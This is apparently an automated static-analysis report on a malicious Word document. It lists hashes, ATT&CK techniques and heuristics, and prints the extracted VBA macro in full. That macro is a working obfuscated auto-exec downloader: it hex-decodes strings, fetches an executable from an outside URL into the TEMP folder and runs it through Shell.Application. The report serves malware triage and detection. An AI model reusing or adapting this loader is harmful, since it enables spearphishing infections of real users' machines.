Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0f66b81ba27fa0e1…

MALICIOUS

Office (OLE)

Size: 54.0 KB
Created: 2014-12-08 21:27:00
Authoring application: Microsoft Office Word
First seen: 2015-01-04
MD5: ff0694cba3b1ba6b39c997528385e649
SHA-1: 913c55170aeb24353a055525485d9204cc21796c
SHA-256: 0f66b81ba27fa0e18b6545ef0574fc8d1978ff8e6ce27ec14e32951e8e1a4a2b
Risk Score: 274

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing obfuscated VBA macros, indicated by critical heuristics like 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens'. The VBA script attempts to use CreateObject and appears to be a downloader, likely executing a second-stage payload. The presence of auto-execution macros suggests it's intended to be delivered as a spearphishing attachment.

Heuristics (11)

  • ClamAV: Doc.Downloader.Generic-6698421-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
  • VBA macros detected (medium, 7 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER)
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set RYNLMLSHMMO = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("4D53584D4C322E584D4C48545450"))
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
    CreateObject call
    Matched line in script
        Set RYNLMLSHMMO = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("4D53584D4C322E584D4C48545450"))
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low, OLE_VBA_AUTOOPEN)
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro (low, OLE_VBA_WBOPEN)
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro (low, OLE_VBA_AUTO)
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Environ() call (env variable access)
    Matched line in script
    bBBBijgboj.Open Environ(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("54454D50")) & "\ADGYMSEKRJE.exe"
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 8352 bytes
SHA-256: 6c8bc24b6332044f300e5774e785720c922521c7e3646e14c01a0bc2a9bbbc42
Detection: ClamAV: No threats found
Obfuscation or payload: likely
45 of 89 identifiers look randomly generated (e.g. 'D6371647A747467686B6D6D7A66727066696D646') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UDTTLHNNLLR(ByVal JZWYUDMMKHA As String, ByVal WFSSTRSIBJM As String) As Boolean
     Dim RYNLMLSHMMO As Object, GYMRNGSWQQQ As Long, UGNASOWUCJI As Long, XHXKIQBTCVN() As Byte

GoTo vtmvgfzsyydefxdcjcigezvndrzaxivucpeuplxmqhvxfimxkbagctp
Dim yhrwkrzbhxzwqryrcrwlkfuvzxvyqhdozcmmerghtguwuqfbshhdeld As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("75727A6577626A7873657979637A636B6B786F6A6B75676867696B777167746A666176737577786C626B78706E7A766462706F6277626B") For Binary As #24764
Put #24764, , yhrwkrzbhxzwqryrcrwlkfuvzxvyqhdozcmmerghtguwuqfbshhdeld
Close #24764
vtmvgfzsyydefxdcjcigezvndrzaxivucpeuplxmqhvxfimxkbagctp:
    Set RYNLMLSHMMO = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("4D53584D4C322E584D4C48545450"))
GoTo gbcznversblaedbsmidektezzjmdavhwqhhpzqfbiubeuggzuxyjgba
Dim ylepgrevpgieicywsanogcfykkrlpkdsgqocqjvhvftzstuvikdfmma As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("76796664646F756F696C6168626B6A7A62797A77786374637A74626C677466737361756C7565697973627A6E64786F6363726267786979") For Binary As #95221
Put #95221, , ylepgrevpgieicywsanogcfykkrlpkdsgqocqjvhvftzstuvikdfmma
Close #95221
gbcznversblaedbsmidektezzjmdavhwqhhpzqfbiubeuggzuxyjgba:
    RYNLMLSHMMO.Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("474554"), JZWYUDMMKHA, False
GoTo uqunuwpftjpcxboeeyaoscmimdrligherfmextjzvomjtepfxanvbgt
Dim pyqlmlidgyppnoreaobmssolwbwjrexifwellgqggxrjaqeksxxobtg As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("75766163766E736175686766687666626A78726F696373646668726C676A676A636A6C666462797271776A6D6B726F61706761616E7378") For Binary As #9306
Put #9306, , pyqlmlidgyppnoreaobmssolwbwjrexifwellgqggxrjaqeksxxobtg
Close #9306
uqunuwpftjpcxboeeyaoscmimdrligherfmextjzvomjtepfxanvbgt:
    RYNLMLSHMMO.Send bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("E0EFF0EEC8C4CB")



GoTo jfbufxfpcxhwfvancghgnbqhtdhiinqttsnsagbelagomwjbnpfdfeq
Dim mtxixskaksklpcbawnrxiurhekwwmpqsovezwwtwmeydojzswrfnxyr As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("747668736B61746162706D6A75786C7066706973656D65637877636E616669786D646C61777863647A6779707A76627A7575626A6D7361") For Binary As #61996
Put #61996, , mtxixskaksklpcbawnrxiurhekwwmpqsovezwwtwmeydojzswrfnxyr
Close #61996
jfbufxfpcxhwfvancghgnbqhtdhiinqttsnsagbelagomwjbnpfdfeq:
    XHXKIQBTCVN = RYNLMLSHMMO.responseBody

GoTo ovmcwqriqtkzuwdaauergzkkfalapjmgbpraisfeokcwxjdkqlmzvgw
Dim sfksnnazwxconxwyyatnthgictvvlzkycznxiarifyxdbfpwpybuhwx As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6574666267646763696567636969686273756D6162626D6972736E69736D726C657076786868717470637766767271756F75657772767A") For Binary As #60350
Put #60350, , sfksnnazwxconxwyyatnthgictvvlzkycznxiarifyxdbfpwpybuhwx
Close #60350
ovmcwqriqtkzuwdaauergzkkfalapjmgbpraisfeokcwxjdkqlmzvgw:
    UGNASOWUCJI = FreeFile
    Open WFSSTRSIBJM For Binary As #UGNASOWUCJI
    Put #UGNASOWUCJI, , XHXKIQBTCVN
    Close #UGNASOWUCJI
GoTo bcwfhdfyravqqytuwvakxkdggqlggtuiegrezlkormbjefwaoalmzhz
Dim nlcaasbsljekgdbgnbedvhwcljgvjyqqvzmauvfqkuzwpmxfjkwvzhi As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("706C68726B637772676D6E6E75656C6F6E627A646E756E7369766D7777716565646D6376697466757A6A78656662637171616769766465") For Binary As #90758
Put #90758, , nlcaasbsljekgdbgnbedvhwcljgvjyqqvzmauvfqkuzwpmxfjkwvzhi
Close #90758
bcwfhdfyravqqytuwvakxkdggqlggtuiegrezlkormbjefwaoalmzhz:
    
GoTo bdpgcfjcyqybrkxkdlkwhcelueblirhjzbjikslcugrglzpmbqxszpl
Dim iljtxqmvwockhvqygdxkwopvidgpvqitatomslyieqhaufqdpvhvnmc As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6E706A756575796E6E636D756C7071707475717A797462756E63796465746B78786C75636E727A646571667861766A73756C756E6A656D") For Binary As #69362
Put #69362, , iljtxqmvwockhvqygdxkwopvidgpvqitatomslyieqhaufqdpvhvnmc
Close #69362
bdpgcfjcyqybrkxkdlkwhcelueblirhjzbjikslcugrglzpmbqxszpl:
Set bBBBijgboj = CreateObject(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("5368656C6C2E4170706C69636174696F6E"))
GoTo zszhxkwuaxliphvsuplxfmmmycjnyryqymnbgphvmwlqkgceisvyvts
Dim zvxuakausarigrbhfoldquburxmwvltozvrglgcvkttolbvtrvdrcgh As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6C62757473677764747069747770707176746276616B6A6864637267706E79636B78717A6D69776B797067666975716A71726F7A736165") For Binary As #82676
Put #82676, , zvxuakausarigrbhfoldquburxmwvltozvrglgcvkttolbvtrvdrcgh
Close #82676
zszhxkwuaxliphvsuplxfmmmycjnyryqymnbgphvmwlqkgceisvyvts:
bBBBijgboj.Open Environ(bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("54454D50")) & "\ADGYMSEKRJE.exe"
 End Function
Sub Auto_Open()
GoTo gxcesvzrytwmgpnfzdydwcvshzlloxgsmirvcuebkomddapxaoohijd
Dim usfoyeliixnbtdjolyiyzkxwbjbgjkrwvonixtxsznnchbknwnismrr As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6D666C73777475666F72706179686565636879666D6B6E6563707367787A65757A6B78627363626F636F677071716B6673656E636A6B67") For Binary As #70233
Put #70233, , usfoyeliixnbtdjolyiyzkxwbjbgjkrwvonixtxsznnchbknwnismrr
Close #70233
gxcesvzrytwmgpnfzdydwcvshzlloxgsmirvcuebkomddapxaoohijd:
QTQFFWAVZYZ
End Sub
Sub AutoOpen()
GoTo uivmhecwuiwlbimfgalxtqlcqgsrdgcdxvzoqjlbmvygqsadawwnbod
Dim ommfkqgicbhzvxsnjdmcsecmotnxslatlkhbycxrahpzkwuhnwvxwcl As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("7868736E61706A72717368786E66666E6372646C6A7A61696567616168776D75747564667763676D617475716777646F6272656C6C656C") For Binary As #99406
Put #99406, , ommfkqgicbhzvxsnjdmcsecmotnxslatlkhbycxrahpzkwuhnwvxwcl
Close #99406
uivmhecwuiwlbimfgalxtqlcqgsrdgcdxvzoqjlbmvygqsadawwnbod:
    Auto_Open
End Sub
Sub Workbook_Open()
GoTo xxnryhubwoumsgallobzqbhnudqiegipodsbviyqnfdvlorvstshjoz
Dim tgctjrzhvnobidbwvwfqdulntkywxnojcbyyjbglyutkatmmtkssbxb As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("656C666B6564787670696C7864626A7375796E6C6674626A71736F647163657569756573716F6D72616E75656268777074776F6C657962") For Binary As #52822
Put #52822, , tgctjrzhvnobidbwvwfqdulntkywxnojcbyyjbglyutkatmmtkssbxb
Close #52822
xxnryhubwoumsgallobzqbhnudqiegipodsbviyqnfdvlorvstshjoz:
    Auto_Open
End Sub

GoTo ujuupwagavxxttpthatlgfenwuvykdhddukuvzyztzdbskjhhnscqru
Dim mpjunamyoddhpjlckwqydefzmiqxmtdzvxzptikszkphtiolhryphyi As String
Open bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("6D6371647A747467686B6D6D7A66727066696D646C686C7167676776707477797469696C6B7463697876726F6E6E636B6C666C70706B77") For Binary As #3723
Put #3723, , mpjunamyoddhpjlckwqydefzmiqxmtdzvxzptikszkphtiolhryphyi
Close #3723
ujuupwagavxxttpthatlgfenwuvykdhddukuvzyztzdbskjhhnscqru:
     
End Sub
Sub QTQFFWAVZYZ()
    UDTTLHNNLLR bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr("687474703A2F2F6F70656E737461636B73672E636F6D2F6A732F62696E2E657865"), Environ("TEMP") & "\ADGYMSEKRJE.exe"
End Sub


Public Function bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr(ByVal GVHUjdsf4f As String) As String
  Dim i       As Long
  For i = 1 To Len(GVHUjdsf4f) Step 2
If 871851 = 871851 + 1 Then End
If 6292 < 27 Then
If 549589 = 549589 + 1 Then End
If 2244 < 25 Then
        MsgBox ("ZRhNNOHl97")
End If
If Len("ZOhjMOnl6417") = Len("xeFXDFFY") Then
       MsgBox ("Error !!!")
End If
        MsgBox ("fSlPSZnM79")

End If
If Len("CSHpvLRP9465") = Len("vhlxUkrj") Then
If 272625 = 272625 + 1 Then End
If 2624 < 82 Then
        MsgBox ("TQxnjYFY33")
End If
If Len("ZuzjUIji3464") = Len("rPTEHuGF") Then
       MsgBox ("Error !!!")
End If
       MsgBox ("Error !!!")

End If
If 958631 = 958631 + 1 Then End
If 7345 < 91 Then
        MsgBox ("aPgyRpZl73")
End If
If Len("aHfxvpdl1518") = Len("pRWkXaVk") Then
       MsgBox ("Error !!!")
End If
  bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr = bhyhpzgylkokxdbrymbdjyinsqrtnanepwfvwtjkhkurhpkbzgdsojr & Chr$(Val("&H" & Mid$(GVHUjdsf4f, i, 2)))


  Next i
 End Function